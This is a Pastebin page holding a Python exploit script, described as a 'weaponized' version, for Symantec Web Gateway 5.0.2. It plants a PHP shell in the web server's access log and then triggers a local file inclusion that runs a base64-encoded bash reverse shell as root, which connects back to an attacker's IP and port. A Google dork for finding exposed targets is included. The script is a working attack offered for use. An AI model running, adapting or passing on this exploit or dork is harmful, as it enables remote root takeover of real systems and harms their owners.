Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- # Symantec Web Gateway 5.0.2 Remote LFI root Exploit
- # Slightly weaponized version of Muts exploit
- # See http://www.exploit-db.com/exploits/18932/ for original
- # infodox - http://insecurety.net
- # NOW WITH GOOGLE DORK :D
- # Googledork: inurl:"spywall" intitle:"symantec Web Gateway" filetype:php
- # Variations of that should be fine... There are not many indexed but still :)
- # Thanks to dir\n0h for the dork :3
- import base64
- import socket
- import sys
- def banner():
- print """
- Symantec Web Gateway 5.0.2 Remote LFI root Exploit
- Original bug and exploit by muts (at) offensive-security (dot) com
- Somewhat more weaponized exploit by infodox (at) insecurety.net
- Original Exploit: http://www.exploit-db.com/exploits/18932/
- All we did was make it a bit more useable :)
- """
- if len(sys.argv) != 4:
- banner()
- print "Usage: ./x2.py <target> <reverseip> <reverseport>"
- sys.exit(1)
- banner()
- target = sys.argv[1]
- reverseip = sys.argv[2]
- reverseport = sys.argv[3]
- payload= '''echo '#!/bin/bash' > /tmp/networkScript; echo 'bash -i >& /dev/tcp/%s/%s 0>&1' >> /tmp/networkScript;chmod 755 /tmp/networkScript; sudo /tmp/networkScript''' %(reverseip, reverseport)
- payloadencoded=base64.encodestring(payload).replace("\n","")
- taint="GET /<?php shell_exec(base64_decode('%s'));?> HTTP/1.1\r\n\r\n" % payloadencoded
- print "[*] Using " + target + " as our target!"
- print "[*] Reverse Shell Phoning home to " + reverseip
- print "[*] Better have your listener on " +reverseport
- print "[+] Injecting the evil PHP shell..."
- expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
- expl.connect((target, 80))
- expl.send(taint)
- expl.close()
- print "[+] Triggering the bug..."
- trigger="GET /spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log HTTP/1.0\r\n\r\n"
- expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
- expl.connect((target, 80))
- expl.send(trigger)
- expl.close()
- print "[+] Enjoy your shell :)"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement